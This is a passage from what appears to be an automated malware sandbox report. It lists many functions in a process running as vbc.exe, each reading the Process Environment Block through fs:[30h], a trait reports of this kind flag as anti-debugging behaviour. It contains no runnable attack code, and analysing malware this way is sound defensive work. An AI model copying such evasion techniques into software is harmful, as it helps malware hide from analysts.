                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C188 mov eax, dword ptr fs:[00000030h]4_2_0568C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C188 mov eax, dword ptr fs:[00000030h]4_2_0568C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610185 mov eax, dword ptr fs:[00000030h]4_2_05610185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674180 mov eax, dword ptr fs:[00000030h]4_2_05674180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674180 mov eax, dword ptr fs:[00000030h]4_2_05674180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565019F mov eax, dword ptr fs:[00000030h]4_2_0565019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2050 mov eax, dword ptr fs:[00000030h]4_2_055D2050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FC073 mov eax, dword ptr fs:[00000030h]4_2_055FC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05656050 mov eax, dword ptr fs:[00000030h]4_2_05656050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE016 mov eax, dword ptr fs:[00000030h]4_2_055EE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666030 mov eax, dword ptr fs:[00000030h]4_2_05666030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654000 mov ecx, dword ptr fs:[00000030h]4_2_05654000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672000 mov eax, dword ptr fs:[00000030h]4_2_05672000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA020 mov eax, dword ptr fs:[00000030h]4_2_055CA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC020 mov eax, dword ptr fs:[00000030h]4_2_055CC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056560E0 mov eax, dword ptr fs:[00000030h]4_2_056560E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056120F0 mov ecx, dword ptr fs:[00000030h]4_2_056120F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC0F0 mov eax, dword ptr fs:[00000030h]4_2_055CC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D80E9 mov eax, dword ptr fs:[00000030h]4_2_055D80E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056520DE mov eax, dword ptr fs:[00000030h]4_2_056520DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA0E3 mov ecx, dword ptr fs:[00000030h]4_2_055CA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056680A8 mov eax, dword ptr fs:[00000030h]4_2_056680A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056960B8 mov eax, dword ptr fs:[00000030h]4_2_056960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056960B8 mov ecx, dword ptr fs:[00000030h]4_2_056960B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D208A mov eax, dword ptr fs:[00000030h]4_2_055D208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C80A0 mov eax, dword ptr fs:[00000030h]4_2_055C80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567437C mov eax, dword ptr fs:[00000030h]4_2_0567437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A634F mov eax, dword ptr fs:[00000030h]4_2_056A634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05652349 mov eax, dword ptr fs:[00000030h]4_2_05652349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05678350 mov ecx, dword ptr fs:[00000030h]4_2_05678350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov ecx, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565035C mov eax, dword ptr fs:[00000030h]4_2_0565035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569A352 mov eax, dword ptr fs:[00000030h]4_2_0569A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC310 mov ecx, dword ptr fs:[00000030h]4_2_055CC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov ecx, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A8324 mov eax, dword ptr fs:[00000030h]4_2_056A8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F0310 mov ecx, dword ptr fs:[00000030h]4_2_055F0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A30B mov eax, dword ptr fs:[00000030h]4_2_0560A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA3C0 mov eax, dword ptr fs:[00000030h]4_2_055DA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D83C0 mov eax, dword ptr fs:[00000030h]4_2_055D83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056063FF mov eax, dword ptr fs:[00000030h]4_2_056063FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C3CD mov eax, dword ptr fs:[00000030h]4_2_0568C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056563C0 mov eax, dword ptr fs:[00000030h]4_2_056563C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE3F0 mov eax, dword ptr fs:[00000030h]4_2_055EE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056743D4 mov eax, dword ptr fs:[00000030h]4_2_056743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056743D4 mov eax, dword ptr fs:[00000030h]4_2_056743D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E03E9 mov eax, dword ptr fs:[00000030h]4_2_055E03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E3DB mov eax, dword ptr fs:[00000030h]4_2_0567E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E3DB mov eax, dword ptr fs:[00000030h]4_2_0567E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E3DB mov ecx, dword ptr fs:[00000030h]4_2_0567E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E3DB mov eax, dword ptr fs:[00000030h]4_2_0567E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8397 mov eax, dword ptr fs:[00000030h]4_2_055C8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8397 mov eax, dword ptr fs:[00000030h]4_2_055C8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8397 mov eax, dword ptr fs:[00000030h]4_2_055C8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F438F mov eax, dword ptr fs:[00000030h]4_2_055F438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F438F mov eax, dword ptr fs:[00000030h]4_2_055F438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE388 mov eax, dword ptr fs:[00000030h]4_2_055CE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE388 mov eax, dword ptr fs:[00000030h]4_2_055CE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CE388 mov eax, dword ptr fs:[00000030h]4_2_055CE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6259 mov eax, dword ptr fs:[00000030h]4_2_055D6259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA250 mov eax, dword ptr fs:[00000030h]4_2_055CA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680274 mov eax, dword ptr fs:[00000030h]4_2_05680274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05658243 mov eax, dword ptr fs:[00000030h]4_2_05658243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05658243 mov ecx, dword ptr fs:[00000030h]4_2_05658243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C826B mov eax, dword ptr fs:[00000030h]4_2_055C826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A625D mov eax, dword ptr fs:[00000030h]4_2_056A625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568A250 mov eax, dword ptr fs:[00000030h]4_2_0568A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568A250 mov eax, dword ptr fs:[00000030h]4_2_0568A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4260 mov eax, dword ptr fs:[00000030h]4_2_055D4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4260 mov eax, dword ptr fs:[00000030h]4_2_055D4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4260 mov eax, dword ptr fs:[00000030h]4_2_055D4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C823B mov eax, dword ptr fs:[00000030h]4_2_055C823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA2C3 mov eax, dword ptr fs:[00000030h]4_2_055DA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA2C3 mov eax, dword ptr fs:[00000030h]4_2_055DA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA2C3 mov eax, dword ptr fs:[00000030h]4_2_055DA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA2C3 mov eax, dword ptr fs:[00000030h]4_2_055DA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DA2C3 mov eax, dword ptr fs:[00000030h]4_2_055DA2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A62D6 mov eax, dword ptr fs:[00000030h]4_2_056A62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E02E1 mov eax, dword ptr fs:[00000030h]4_2_055E02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E02E1 mov eax, dword ptr fs:[00000030h]4_2_055E02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E02E1 mov eax, dword ptr fs:[00000030h]4_2_055E02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov eax, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov ecx, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov eax, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov eax, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov eax, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056662A0 mov eax, dword ptr fs:[00000030h]4_2_056662A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E284 mov eax, dword ptr fs:[00000030h]4_2_0560E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560E284 mov eax, dword ptr fs:[00000030h]4_2_0560E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650283 mov eax, dword ptr fs:[00000030h]4_2_05650283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650283 mov eax, dword ptr fs:[00000030h]4_2_05650283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650283 mov eax, dword ptr fs:[00000030h]4_2_05650283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E02A0 mov eax, dword ptr fs:[00000030h]4_2_055E02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E02A0 mov eax, dword ptr fs:[00000030h]4_2_055E02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0D59 mov eax, dword ptr fs:[00000030h]4_2_055D0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0D59 mov eax, dword ptr fs:[00000030h]4_2_055D0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D0D59 mov eax, dword ptr fs:[00000030h]4_2_055D0D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8D59 mov eax, dword ptr fs:[00000030h]4_2_055D8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8D59 mov eax, dword ptr fs:[00000030h]4_2_055D8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8D59 mov eax, dword ptr fs:[00000030h]4_2_055D8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8D59 mov eax, dword ptr fs:[00000030h]4_2_055D8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D8D59 mov eax, dword ptr fs:[00000030h]4_2_055D8D59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05668D6B mov eax, dword ptr fs:[00000030h]4_2_05668D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05658D20 mov eax, dword ptr fs:[00000030h]4_2_05658D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C6D10 mov eax, dword ptr fs:[00000030h]4_2_055C6D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C6D10 mov eax, dword ptr fs:[00000030h]4_2_055C6D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C6D10 mov eax, dword ptr fs:[00000030h]4_2_055C6D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4D30 mov eax, dword ptr fs:[00000030h]4_2_056A4D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EAD00 mov eax, dword ptr fs:[00000030h]4_2_055EAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EAD00 mov eax, dword ptr fs:[00000030h]4_2_055EAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EAD00 mov eax, dword ptr fs:[00000030h]4_2_055EAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05688D10 mov eax, dword ptr fs:[00000030h]4_2_05688D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05688D10 mov eax, dword ptr fs:[00000030h]4_2_05688D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05604D1D mov eax, dword ptr fs:[00000030h]4_2_05604D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FEDD3 mov eax, dword ptr fs:[00000030h]4_2_055FEDD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FEDD3 mov eax, dword ptr fs:[00000030h]4_2_055FEDD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05670DF0 mov eax, dword ptr fs:[00000030h]4_2_05670DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05670DF0 mov eax, dword ptr fs:[00000030h]4_2_05670DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C6DF6 mov eax, dword ptr fs:[00000030h]4_2_055C6DF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FCDF0 mov eax, dword ptr fs:[00000030h]4_2_055FCDF0
